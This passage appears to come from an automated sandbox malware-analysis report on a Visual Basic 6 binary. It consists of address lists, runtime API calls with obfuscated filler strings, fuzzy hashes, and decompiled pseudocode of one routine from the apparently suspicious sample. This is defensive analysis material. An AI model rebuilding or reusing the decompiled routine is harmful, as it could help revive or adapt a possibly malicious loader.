      0x0041ce4d
      0x0041ce52
      0x0041ce52
      0x0041ce68
      0x0041ce6f
      0x0041ce79
      0x0041ce80
      0x0041ce85
      0x0041ce92
      0x0041ce99
      0x0041cecc
      0x0041ced8
      0x0041cf0a
      0x0041cf17
      0x0041cf1c
      0x0041cf27
      0x0041cf34
      0x0041cf39
      0x0041cf3f
      0x0041cf45
      0x0041cf52
      0x0041cf57
      0x0041cf68
      0x0041cf6d
      0x0041cf85
      0x0041cfa1
      0x0041cfad
      0x0041cfb3
      0x0041cfc6
      0x0041cfd9
      0x0041cfe2
      0x0041cfef
      0x0041cff4
      0x0041cffb
      0x0041d005
      0x0041d00f
      0x0041d016
      0x0041d023
      0x0041d02e
      0x0041d033
      0x0041d040
      0x0041d047
      0x0041d05f
      0x0041d06b
      0x0041d080
      0x0041d086
      0x0041d093
      0x0041d0b5
      0x0041d095
      0x0041d095
      0x0041d09a
      0x0041d09f
      0x0041d0a2
      0x0041d0a8
      0x0041d0ad
      0x0041d0ad
      0x0041d0c2
      0x0041d0cd
      0x0041d0d7
      0x0041d0dc
      0x0041d0e3
      0x0041d108
      0x0041d115
      0x0041d128
      0x0041d135
      0x0041d139
      0x0041d142
      0x0041d156
      0x0041d18c
      0x0041d192
      0x0041d19f
      0x0041d1c1
      0x0041d1a1
      0x0041d1a1
      0x0041d1a6
      0x0041d1ab
      0x0041d1ae
      0x0041d1b4
      0x0041d1b9
      0x0041d1b9
      0x0041d1ce
      0x0041d1d3
      0x0041d1dd
      0x0041d207
      0x0041d20d
      0x0041d21a
      0x0041d23c
      0x0041d21c
      0x0041d21c
      0x0041d221
      0x0041d226
      0x0041d229
      0x0041d22f
      0x0041d234
      0x0041d234
      0x0041d243
      0x0041d24d
      0x0041d263
      0x0041d278
      0x0041d284
      0x0041d291
      0x0041d2a1
      0x0041d2a6
      0x0041d2af
      0x0041d2cb
      0x0041d2d7
      0x0041d2f8
      0x0041d304
      0x0041d317
      0x0041d32f
      0x0041d337
      0x0041d341
      0x0041d34d
      0x0041d354
      0x0041d361
      0x0041d367
      0x0041d37a
      0x0041d380
      0x0041d38d
      0x0041d3af
      0x0041d38f
      0x0041d38f
      0x0041d394
      0x0041d399
      0x0041d39c
      0x0041d3a2
      0x0041d3a7
      0x0041d3a7
      0x0041d3bc
      0x0041d3c7
      0x0041d3d1
      0x0041d3d6
      0x0041d3fc
      0x0041d402
      0x0041d40f
      0x0041d431
      0x0041d411
      0x0041d411
      0x0041d416
      0x0041d41b
      0x0041d41e
      0x0041d424
      0x0041d429
      0x0041d429
      0x0041d43e
      0x0041d443
      0x0041d450
      0x0041d45c
      0x0041d469
      0x0041d474
      0x0041d47a
      0x0041d48d
      0x0041d498
      0x0041d49e
      0x0041d4b0
      0x0041d4cb
      0x0041d4de
      0x0041d4f3
      0x0041d4f9
      0x0041d506
      0x0041d528
      0x0041d508
      0x0041d508
      0x0041d50d
      0x0041d512
      0x0041d515
      0x0041d51b
      0x0041d520
      0x0041d520
      0x0041d535
      0x0041d53b
      0x0041d54b
      0x0041d556
      0x0041d55d
      0x0041d564
      0x0041d56b
      0x0041d56c
      0x0041d572
      0x0041d573
      0x0041d575
      0x0041d583
      0x0041d585
      0x0041d58b
      0x0041d58f
      0x0040154c
      0x0040154c
      0x0041d595
      0x0041d5a5
      0x0041d5a6
      0x0041d5ac
      0x0041d5ad
      0x0041d5b2
      0x0041d5bf
      0x0041d5d4
      0x0041d5c1
      0x0041d5c1
      0x0041d5c7
      0x0041d5cc
      0x0041d5cc
      0x0041d5e7
      0x0041d5f3
      0x0041d5fa
      0x0041d600
      0x0041d60d
      0x0041d612
      0x0041d61c
      0x0041d626
      0x0041d62d
      0x0041d632
      0x0041d640
      0x0041d64d
      0x0041d653
      0x0041d666
      0x0041d679
      0x0041d67f
      0x0041d686
      0x0041d694
      0x0041d69a
      0x0041d6a7
      0x0041d6c9
      0x0041d6a9
      0x0041d6a9
      0x0041d6ae
      0x0041d6b3
      0x0041d6b6
      0x0041d6bc
      0x0041d6c1
      0x0041d6c1
      0x0041d6d7
      0x0041d6f2
      0x0041d70f
      0x0041d718
      0x0041d725
      0x0041d72a
      0x0041d736
      0x0041d73b
      0x0041d74d
      0x0041d752
      0x0041d787
      0x0041d793
      0x0041d798
      0x0041d79d
      0x0041d7a7
      0x0041d7ba
      0x0041d7bf
      0x0041d7c9
      0x0041d7dc
      0x0041d7e9
      0x0041d7f0
      0x0041d7f6
      0x0041d804
      0x0041d80a
      0x0041d811
      0x0041d812
      0x0041d890
      0x0041d898
      0x0041d8a0
      0x0041d8a6
      0x0041d8ac
      0x0041d8ad
      0x0041d8af
      0x0041d8b7
      0x0041d8bf
      0x0041d8c7
      0x0041d8cf
      0x0041d8d7
      0x0041d8e2
      0x0041d8e7

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041C272
      • __vbaAryConstruct2.MSVBVM60(?,004029B8,00000002,?,?,?,?,00401546), ref: 0041C2AC
      • __vbaVarDup.MSVBVM60 ref: 0041C2D1
      • #522.MSVBVM60(?,?), ref: 0041C2E4
      • __vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C2F7
      • #713.MSVBVM60(00000000,?,?,?,?), ref: 0041C2FD
      • #558.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C319
      • __vbaFreeStr.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C333
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,00000008,00000008,00000000,?,?,?,?), ref: 0041C34F
      • #541.MSVBVM60(?,7:7:7,?,?,?,00401546), ref: 0041C372
      • __vbaStrVarMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C37E
      • __vbaStrMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C388
      • __vbaFreeVar.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C393
      • __vbaVarDup.MSVBVM60 ref: 0041C3B8
      • #524.MSVBVM60(?,?), ref: 0041C3CB
      • __vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C3DE
      • #690.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C3F3
      • __vbaFreeStr.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C3FE
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C413
      • #610.MSVBVM60(?,?,?,?,00401546), ref: 0041C422
      • #661.MSVBVM60(?,00402528,?,?,?,?,?,?,?,00401546), ref: 0041C445
      • __vbaVarTstGe.MSVBVM60(00008002,?), ref: 0041C46C
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?), ref: 0041C488
      • #705.MSVBVM60(00000002,00000000), ref: 0041C4B8
      • __vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041C4C2
      • __vbaFreeVar.MSVBVM60(00000002,00000000), ref: 0041C4CD
      • #670.MSVBVM60(00000002,00000002,00000000), ref: 0041C4D9
      • __vbaStrVarMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C4E5
      • __vbaStrMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C4EF
      • __vbaFreeVar.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C4FA
      • __vbaVarDup.MSVBVM60 ref: 0041C51F
      • #560.MSVBVM60(?), ref: 0041C52B
      • __vbaFreeVar.MSVBVM60(?), ref: 0041C548
      • #648.MSVBVM60(0000000A,?), ref: 0041C588
      • __vbaFreeVar.MSVBVM60(0000000A,?), ref: 0041C59F
      • __vbaVarDup.MSVBVM60(0000000A,?), ref: 0041C600
      • #606.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041C60E
      • __vbaStrMove.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041C61B
      • __vbaLenBstr.MSVBVM60(00000000,00000010,0000000A,0000000A,?), ref: 0041C621
      • #574.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C63D
      • __vbaStrMove.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C64A
      • #696.MSVBVM60(00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C650
      • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C672
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041C68A
      • #648.MSVBVM60(0000000A), ref: 0041C6DA
      • __vbaFreeVar.MSVBVM60(0000000A), ref: 0041C6F2
      • #696.MSVBVM60(OFFENTLIGHEDSSFRE,0000000A), ref: 0041C729
      • #696.MSVBVM60(Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041C76D
      • __vbaNew2.MSVBVM60(004025A8,004223C0,Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041C792
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402598,00000014), ref: 0041C7F7
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B8,00000070), ref: 0041C853
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B8,00000070), ref: 0041C878
      • #519.MSVBVM60(tilskrersaksene,?), ref: 0041C882
      • __vbaStrMove.MSVBVM60(tilskrersaksene,?), ref: 0041C88F
      • #519.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041C895
      • __vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041C8A2
      • __vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041C8C6
      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041C906
      • #648.MSVBVM60(0000000A), ref: 0041C929
      • __vbaStrCopy.MSVBVM60 ref: 0041C949
      • __vbaFreeStr.MSVBVM60 ref: 0041C9AD
      • __vbaFreeVar.MSVBVM60 ref: 0041C9B8
      • #527.MSVBVM60(Forretningsbrevet5), ref: 0041C9CC
      • __vbaStrMove.MSVBVM60(Forretningsbrevet5), ref: 0041C9D9
      • __vbaFreeStr.MSVBVM60 ref: 0041C9FA
      • __vbaStrCopy.MSVBVM60 ref: 0041CA0A
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402348,000006F8), ref: 0041CA52
      • __vbaStrMove.MSVBVM60(00000000,00401260,00402348,000006F8), ref: 0041CA82
      • __vbaFreeStr.MSVBVM60(00000000,00401260,00402348,000006F8), ref: 0041CA8D
      • #535.MSVBVM60(00000000,00401260,00402348,000006F8), ref: 0041CA92
      • #564.MSVBVM60(00000004,?), ref: 0041CAC1
      • __vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041CADB
      • #685.MSVBVM60(00000004,?), ref: 0041CAEF
      • __vbaObjSet.MSVBVM60(?,00000000,00000004,?), ref: 0041CAFC
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402658,0000001C), ref: 0041CB43
      • __vbaI4Var.MSVBVM60(?), ref: 0041CB72
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402348,000006FC), ref: 0041CBDE
      • __vbaFreeObj.MSVBVM60(00000000,00401260,00402348,000006FC), ref: 0041CBF8
      • __vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 0041CC0D
      • #537.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CC1A
      • __vbaStrMove.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CC27
      • #696.MSVBVM60(00000000,0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CC2D
      • #648.MSVBVM60(0000000A), ref: 0041CC54
      • __vbaR8FixI4.MSVBVM60(0000000A), ref: 0041CC66
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402348,00000700), ref: 0041CCDC
      • __vbaFreeStr.MSVBVM60(00000000,00401260,00402348,00000700), ref: 0041CCF6
      • __vbaFreeVar.MSVBVM60(00000000,00401260,00402348,00000700), ref: 0041CD01
      • #648.MSVBVM60(0000000A), ref: 0041CD21
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402348,00000704), ref: 0041CD77
      • __vbaFreeVar.MSVBVM60(00000000,00401260,00402348,00000704), ref: 0041CD91
      • #648.MSVBVM60(0000000A), ref: 0041CDB1
      • #714.MSVBVM60(?,00000004,00000000,0000000A), ref: 0041CDE3
      • #648.MSVBVM60(0000000A,?,00000004,00000000,0000000A), ref: 0041CE03
      • #564.MSVBVM60(00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CE33
      • __vbaHresultCheck.MSVBVM60(00000000,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CE4D
      • __vbaI4Var.MSVBVM60(?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CE80
      • __vbaI4Var.MSVBVM60(?,?,?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CE99
      • __vbaFreeVarList.MSVBVM60(00000006,0000000A,00000004,0000000A,00000004,?,?), ref: 0041CF0A
      • #581.MSVBVM60(eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CF17
      • #713.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CF27
      • __vbaStrMove.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CF34
      • __vbaFpI4.MSVBVM60 ref: 0041CF52
      • __vbaStrCopy.MSVBVM60 ref: 0041CF68
      • __vbaStrMove.MSVBVM60(Benefact6,?), ref: 0041CF85
      • __vbaStrMove.MSVBVM60 ref: 0041CFC6
      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041CFE2
      • #696.MSVBVM60(ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CFEF
      • #574.MSVBVM60(00000003), ref: 0041D016
      • __vbaStrMove.MSVBVM60(00000003), ref: 0041D023
      • __vbaR8IntI4.MSVBVM60(00000003), ref: 0041D02E
      • __vbaLenBstrB.MSVBVM60(Whiskysourens1,?,?,?), ref: 0041D06B
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402348,00000708), ref: 0041D0A8
      • __vbaFreeStr.MSVBVM60(00000000,00401260,00402348,00000708), ref: 0041D0C2
      • __vbaFreeVar.MSVBVM60(00000000,00401260,00402348,00000708), ref: 0041D0CD
      • #696.MSVBVM60(Kainsmrkernes3), ref: 0041D0D7
      • __vbaStrCopy.MSVBVM60 ref: 0041D156
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402348,0000070C), ref: 0041D1B4
      • __vbaFreeStr.MSVBVM60(00000000,00401260,00402348,0000070C), ref: 0041D1CE
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402348,00000710), ref: 0041D22F
      • __vbaVarDup.MSVBVM60(00000000,00401260,00402348,00000710), ref: 0041D263
      • #607.MSVBVM60(?,00000065,00000003), ref: 0041D278
      • __vbaStrVarMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D284
      • __vbaStrMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D291
      • __vbaStrCopy.MSVBVM60(?,?,00000065,00000003), ref: 0041D2A1
      • __vbaLenBstrB.MSVBVM60(Udstillingslokalet,?,?,000FFFC6,005EA767,?,?,00000065,00000003), ref: 0041D2D7
      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041D317
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000), ref: 0041D32F
      • #705.MSVBVM60(00000002,00000000), ref: 0041D354
      • __vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041D361
      • __vbaLenBstrB.MSVBVM60(00000000,00000002,00000000), ref: 0041D367
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402348,00000714), ref: 0041D3A2
      • __vbaFreeStr.MSVBVM60(00000000,00401260,00402348,00000714), ref: 0041D3BC
      • __vbaFreeVar.MSVBVM60(00000000,00401260,00402348,00000714), ref: 0041D3C7
      • __vbaLenBstr.MSVBVM60(Generalisations7), ref: 0041D3D1
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402348,00000718), ref: 0041D424
      • #525.MSVBVM60(00000067), ref: 0041D443
      • __vbaStrMove.MSVBVM60(00000067), ref: 0041D450
      • #618.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D45C
      • __vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D469
      • __vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D48D
      • __vbaStrCopy.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D4B0
      • __vbaStrMove.MSVBVM60(?,SOLITRSKAKKEN,Indvi2,Fdres,?,STRUTTENDE,00000017,00000067), ref: 0041D4DE
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402348,0000071C), ref: 0041D51B
      • __vbaStrMove.MSVBVM60(00000000,00401260,00402348,0000071C), ref: 0041D54B
      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0041D575
      • #564.MSVBVM60(00000005,?), ref: 0041D5AD
      • __vbaHresultCheck.MSVBVM60(00000000), ref: 0041D5C7
      • #541.MSVBVM60(?,16:16:16), ref: 0041D5E7
      • __vbaStrVarVal.MSVBVM60(?,?,?,16:16:16), ref: 0041D5FA
      • #519.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041D600
      • __vbaStrMove.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041D60D
      • #648.MSVBVM60(0000000A,00000000,?,?,?,16:16:16), ref: 0041D62D
      • __vbaStrMove.MSVBVM60(?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041D679
      • __vbaI4Var.MSVBVM60(?,00000000,?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041D686
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402348,00000720), ref: 0041D6BC
      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D6F2
      • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0041D718
      • #696.MSVBVM60(0040290C), ref: 0041D725
      • #696.MSVBVM60(00402954,0040290C), ref: 0041D736
      • __vbaStrCopy.MSVBVM60(00402954,0040290C), ref: 0041D74D
      • __vbaFreeStr.MSVBVM60 ref: 0041D793
      • __vbaVarMove.MSVBVM60 ref: 0041D7BA
      • __vbaVarMove.MSVBVM60 ref: 0041D7DC
      • __vbaVarIdiv.MSVBVM60(?,?,?), ref: 0041D7F0
      • __vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 0041D7F6
      • __vbaFreeVar.MSVBVM60(0041D8E8), ref: 0041D890
      • __vbaFreeStr.MSVBVM60(0041D8E8), ref: 0041D898
      • __vbaAryDestruct.MSVBVM60(00000000,?,0041D8E8), ref: 0041D8AF
      • __vbaFreeStr.MSVBVM60(00000000,?,0041D8E8), ref: 0041D8B7
      • __vbaFreeStr.MSVBVM60(00000000,?,0041D8E8), ref: 0041D8BF
      • __vbaFreeStr.MSVBVM60(00000000,?,0041D8E8), ref: 0041D8C7
      • __vbaFreeStr.MSVBVM60(00000000,?,0041D8E8), ref: 0041D8CF
      • __vbaFreeVar.MSVBVM60(00000000,?,0041D8E8), ref: 0041D8D7
      • __vbaFreeStr.MSVBVM60(00000000,?,0041D8E8), ref: 0041D8E2
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$Move$CheckHresult$List$#648#696$Copy$Bstr$#519#564$#541#574#705#713$#522#524#525#527#535#537#558#560#581#606#607#610#618#661#670#685#690#714ChkstkConstruct2DestructIdivNew2
      • String ID: 16:16:16$7:7:7$=9$ADMIRINGLY$ASCRY$Admiraliteternes1$Benefact6$Bursati$CANNIBALEAN$DUMBFISH$Dagvagten$Fdres$Forretningsbrevet5$Generalisations7$Hjortens$Indvi2$Kainsmrkernes3$Lersernes$OFFENTLIGHEDSSFRE$Odontoma7$Paucify9$RODTEGNENES$Readjust$SELVFINANSIEREDES$SOLITRSKAKKEN$STRUTTENDE$Skovteknikeren6$Snoreskrternes8$Udstillingslokalet$Utrecht8$Vidnefast$Whiskysourens1$blaarv$centralregeringens$eudaemonistical$multivalent$replicr$tilskrersaksene$tril$undrede
      • API String ID: 1918163132-2023598156
      • Opcode ID: e97538a1b316eec49a37df6d2cf720c899f287313d833d456012f854f637a38c
      • Instruction ID: 2333f574229d3ce505e737fc6e4ca6b886a8d2e5392d7ceed96f0bb2b2a16bb6
      • Opcode Fuzzy Hash: e97538a1b316eec49a37df6d2cf720c899f287313d833d456012f854f637a38c
      • Instruction Fuzzy Hash: 2BD2F875940228ABDB21EF61CD85FDDB7B8AF08304F1080EAE509BB1A1DB785B85CF55
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041FB40, Relevance: 124.7, APIs: 62, Strings: 9, Instructions: 416COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 59%
      			E0041FB40(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				short* _v52;
				char _v64;
				short _v72;
				void* _v76;
				char _v80;
				void* _v84;
				intOrPtr _v92;
				char _v100;
				char _v116;
				intOrPtr _v124;
				char _v132;
				short _v140;
				char _v148;
				char _v164;
				intOrPtr _v172;
				char _v180;
				char* _v204;
				intOrPtr _v212;
				void* _v232;
				char _v236;
				short _v240;
				signed int _v244;
				intOrPtr* _v248;
				signed int _v252;
				intOrPtr* _v264;
				signed int _v268;
				signed int _v272;
				signed int _t182;
				short _t184;
				char* _t191;
				short _t193;
				char* _t201;
				short _t204;
				short _t208;
				char* _t210;
				short _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t220;
				short _t222;
				signed int _t223;
				signed int _t225;
				signed int _t227;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t235;
				short _t237;
				signed int _t238;
				signed int _t240;
				short _t242;
				signed int _t243;
				char* _t245;
				char* _t250;
				signed int _t259;
				signed int _t264;
				signed int _t278;
				signed int _t287;
				signed int _t296;
				signed int _t300;
				signed int _t305;
				void* _t334;
				void* _t336;
				intOrPtr _t337;
				void* _t338;

				_t337 = _t336 - 0xc;
				 *[fs:0x0] = _t337;
				L00401540();
				_v16 = _t337;
				_v12 = 0x4013d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t334);
				L004017B6();
				_push(2);
				_push(0x403000);
				_t182 =  &_v64;
				_push(_t182);
				L0040186A();
				if((_t182 | 0xffffffff) != 0) {
					_v92 = 0x80020004;
					_v100 = 0xa;
					_push( &_v100);
					L00401648();
					_v36 = __fp0;
					L00401828();
					_push(0xd4);
					L00401786();
					L0040183A();
				}
				_v124 = 0x80020004;
				_v132 = 0xa;
				_t184 =  &_v132;
				_push(_t184);
				L004017F2();
				_v140 = _t184;
				_v148 = 2;
				_push( &_v148);
				_push( &_v164);
				L004016C0();
				_push(L"Rappees");
				_push(L"Jiggerens");
				_push( &_v100); // executed
				L00401732(); // executed
				_push( &_v100);
				_push( &_v116);
				L00401852();
				_push(0x52);
				_push( &_v164);
				_t191 =  &_v80;
				_push(_t191);
				L00401858();
				_push(_t191);
				L0040162A();
				_v172 = _t191;
				_v180 = 0x8008;
				_push( &_v116);
				_t193 =  &_v180;
				_push(_t193);
				L00401738();
				_v240 = _t193;
				L00401846();
				_push( &_v180);
				_push( &_v116);
				_push( &_v164);
				_push( &_v148);
				_push( &_v132);
				_push( &_v100);
				_push(6);
				L00401840();
				_t338 = _t337 + 0x1c;
				if(_v240 != 0) {
					_v204 = L"PREHISTORICS";
					_v212 = 8;
					L0040184C();
					_push(0xa2);
					_push( &_v100);
					_push( &_v116);
					L00401624();
					_v124 = 0x8d;
					_v132 = 2;
					_push( &_v132);
					_push(0x75);
					_push( &_v116);
					_t250 =  &_v80;
					_push(_t250);
					L00401858();
					_push(_t250);
					L004016A2();
					L0040183A();
					L00401846();
					_push( &_v132);
					_push( &_v116);
					_push( &_v100);
					_push(3);
					L00401840();
					_t338 = _t338 + 0x10;
					if( *0x4223c0 != 0) {
						_v264 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a8);
						L004017CE();
						_v264 = 0x4223c0;
					}
					_v240 =  *_v264;
					_t259 =  *((intOrPtr*)( *_v240 + 0x14))(_v240,  &_v84);
					asm("fclex");
					_v244 = _t259;
					if(_v244 >= 0) {
						_v268 = _v268 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402598);
						_push(_v240);
						_push(_v244);
						L004017C8();
						_v268 = _t259;
					}
					_v248 = _v84;
					_t264 =  *((intOrPtr*)( *_v248 + 0xc0))(_v248,  &_v232);
					asm("fclex");
					_v252 = _t264;
					if(_v252 >= 0) {
						_v272 = _v272 & 0x00000000;
					} else {
						_push(0xc0);
						_push(0x4025b8);
						_push(_v248);
						_push(_v252);
						L004017C8();
						_v272 = _t264;
					}
					_v72 = _v232;
					L004017C2();
				}
				_v92 = 0x3a;
				_v100 = 2;
				_t201 =  &_v100;
				_push(_t201);
				_push(8);
				_push(L"UNINTERMITTEDLY");
				L004016A2();
				_v124 = _t201;
				_v132 = 0x8008;
				_push( &_v116);
				L004017FE();
				_push( &_v132);
				_t204 =  &_v116;
				_push(_t204);
				L00401738();
				_v240 = _t204;
				_push( &_v116);
				_push( &_v132);
				_push( &_v100);
				_push(3);
				L00401840();
				_t208 = _v240;
				if(_t208 != 0) {
					_push(0xb1);
					L00401756();
					L0040183A();
					_push(_t208);
					L004017EC();
					 *_v52 = _t208;
					L00401846();
					_push(L"MINESTRYGNING");
					L004017EC();
					 *((short*)(_v52 + 2)) = _t208;
					_push(L"2:2:2");
					_push( &_v100);
					L0040182E();
					_push( &_v100);
					_t213 =  &_v80;
					_push(_t213);
					L00401858();
					_push(_t213);
					L004017EC();
					_t278 = 2;
					 *((short*)(_v52 + (_t278 << 1))) = _t213;
					L00401846();
					L00401828();
					_t214 = 2;
					 *((short*)(_v52 + _t214 * 3)) = 0x4cf8;
					_t216 = 2;
					 *((short*)(_v52 + (_t216 << 2))) = 0xe04;
					_t218 = 2;
					 *((short*)(_v52 + _t218 * 5)) = 0x1773;
					_t220 = 2;
					 *((short*)(_v52 + _t220 * 6)) = 0x56a4;
					_v92 = 0x42458a;
					_v100 = 3;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_t222 =  &_v100;
					_push(_t222);
					L0040161E();
					L0040183A();
					_push(_t222);
					L004017EC();
					_t287 = 2;
					 *((short*)(_v52 + _t287 * 7)) = _t222;
					L00401846();
					L00401828();
					_t223 = 2;
					 *((short*)(_v52 + (_t223 << 3))) = 0x196e;
					_t225 = 2;
					 *((short*)(_v52 + _t225 * 9)) = 0x15b6;
					_t227 = 2;
					 *((short*)(_v52 + _t227 * 0xa)) = 0x1a5;
					_t229 = 2;
					 *((short*)(_v52 + _t229 * 0xb)) = 0x3c4c;
					_t231 = 2;
					_t232 = _t231 * 0xc;
					 *((short*)(_v52 + _t232)) = 0x3974;
					_push(L"Suppositoriets");
					L004017EC();
					_t296 = 2;
					 *(_v52 + _t296 * 0xd) = _t232;
					_t233 = 2;
					 *((short*)(_v52 + _t233 * 0xe)) = 0x5ff7;
					_t235 = 2;
					 *((short*)(_v52 + _t235 * 0xf)) = 0x758c;
					_v92 = 0x80020004;
					_v100 = 0xa;
					_t237 =  &_v100;
					_push(_t237);
					L004017F2();
					_t300 = 2;
					 *((short*)(_v52 + (_t300 << 4))) = _t237;
					L00401828();
					_t238 = 2;
					 *((short*)(_v52 + _t238 * 0x11)) = 0xef8;
					_t240 = 2;
					 *((short*)(_v52 + _t240 * 0x12)) = 0x12b7;
					_v92 = 0x80020004;
					_v100 = 0xa;
					_t242 =  &_v100;
					_push(_t242);
					L004017F2();
					_t305 = 2;
					 *((short*)(_v52 + _t305 * 0x13)) = _t242;
					L00401828();
					_t243 = 2;
					 *((short*)(_v52 + _t243 * 0x14)) = 0x3e84;
					_v92 = 0x57f4;
					_v100 = 2;
					_push(L"BESMUDSES");
					_t245 =  &_v100;
					_push(_t245);
					L00401618();
					L0040183A();
					_push(_t245);
					L00401696();
					L0040183A();
					L00401846();
					L00401828();
				}
				asm("wait");
				_push(0x42016a);
				L00401846();
				L00401846();
				L00401846();
				_v236 =  &_v64;
				_t210 =  &_v236;
				_push(_t210);
				_push(0);
				L0040173E();
				L00401846();
				return _t210;
			}













































































      0x0041fb43
      0x0041fb52
      0x0041fb5e
      0x0041fb66
      0x0041fb69
      0x0041fb70
      0x0041fb7f
      0x0041fb88
      0x0041fb8d
      0x0041fb8f
      0x0041fb94
      0x0041fb97
      0x0041fb98
      0x0041fba2
      0x0041fba4
      0x0041fbab
      0x0041fbb5
      0x0041fbb6
